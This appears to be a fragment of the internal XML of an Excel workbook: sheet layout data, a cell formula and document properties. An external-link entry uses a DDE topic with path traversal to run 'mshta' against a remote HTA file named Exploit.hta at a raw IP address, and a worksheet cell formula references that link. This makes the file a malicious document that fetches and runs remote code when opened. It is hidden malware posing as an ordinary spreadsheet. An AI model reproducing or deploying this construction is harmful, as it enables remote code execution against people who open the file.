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92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9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SEXCEL" ddeTopic="\..\..\..\mshta http://3.12.41.114/Exploit.hta">
    <ddeItems>
      <ddeItem name="_xlbgnm.A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9"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="J12" sqref="J12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="11" max="11" width="10.6640625" customWidth="1"/>
    <col min="12" max="12" width="5.6640625" bestFit="1" customWidth="1"/>
    <col min="23" max="23" width="9.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="9" spans="23:23" x14ac:dyDescent="0.3">
      <c r="W9" s="1" t="e">
        <f>[1]!_xlbgnm.A1</f>
        <v>#REF!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2018-01-27T23:15:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-10-21T18:40:11Z</dcterms:modified>
</cp:coreProperties>
</file>